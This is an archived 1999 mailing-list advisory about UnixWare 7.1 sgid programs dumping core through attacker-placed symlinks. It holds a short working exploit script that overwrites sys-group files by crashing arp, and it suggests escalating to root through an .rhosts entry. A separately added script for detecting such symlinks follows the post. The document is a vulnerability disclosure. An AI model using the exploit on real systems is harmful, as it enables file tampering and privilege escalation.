UnixWare coredumps follow symlinks

From: Brock Tellier (btellierat_private)
Date: Thu Dec 02 1999 - 18:07:20 PST


    Greetings,
    
    OVERVIEW
    Any user may cause system files to be overwritten with coredump data.  A full
    root compromise may be possible.
    
    BACKGROUND
    All my testing was done on UnixWare 7.1 though I would imagine 7.x is
    vulnerable as well.
    
    DETAILS
    UnixWare's sgid binaries are allowed to dump core (but suids are not).  By
    "calculating" the pid of the sgid binary we will call, we can create a symlink
    from ./core.pid to any file which would be writable by the running group. 
    Many of the sgid binaries are sgid-sys, an extremely sensitive gid to be able
    to play around with.  My arp exploit attached below demonstrates how one would
    overwrite a file using this vulnerability.
    
    Why is a root compromise possible?  Well, assuming that we could somehow get
    "+ +" on a line by itself in the corefile, we could place this into the
    .rhosts file of some group writable directory/.rhosts.  Gaining the additional
    privileges of any system account is usually a fast ticket to root.
    
    EXPLOIT 
    
    #!/bin/sh
    ####
    # Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
    # Guessing pid is trivial.  Any sgid program which will coredump can be used
    # -Brock Tellier, btellierat_private
    ####
    pid=`expr $$ + 4`;
    ln -s /path/to/sys/group/writable/file core.$pid
    /usr/sbin/arp `perl -e "print 'A' x 10000"`
    
    Brock Tellier
    UNIX Systems Administrator
    Chicago, IL, USA
    btellierat_private
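    A defender-side check added here, not part of Brock Tellier's post: it walks a directory that untrusted users can write to (for example a temp directory) and reports every symbolic link named core or core.<pid>, which is the exact setup the advisory relies on. Assumes a POSIX sh with find(1) and readlink(1).

```shell
#!/bin/sh
# Added detection check, not from the original advisory.  A core.<pid>
# symlink sitting in a user-writable directory is the precondition for the
# sgid coredump-follows-symlink problem described above, so each hit deserves
# a look at who created it and where it points.
# Assumes POSIX sh, find(1) and readlink(1).

# core_symlinks DIR
# Prints "<link> -> <target>" for every symlink named core or core.<digits>
# found under DIR.  Regular core files are ignored (-type l = links only).
core_symlinks() {
    find "$1" -type l \( -name core -o -name 'core.[0-9]*' \) \
        -exec sh -c 'for l; do printf "%s -> %s\n" "$l" "$(readlink "$l")"; done' sh {} +
}

# count_core_symlinks DIR
# Same search, but prints only the number of matching links (0 when clean).
count_core_symlinks() {
    find "$1" -type l \( -name core -o -name 'core.[0-9]*' \) | wc -l | tr -d ' '
}

# Usage: "sh check_core_links.sh /tmp" lists hits and exits non-zero on any.
if [ "${1:-}" ]; then
    core_symlinks "$1"
    [ "$(count_core_symlinks "$1")" -eq 0 ]
fi
```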
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:16:46 PDT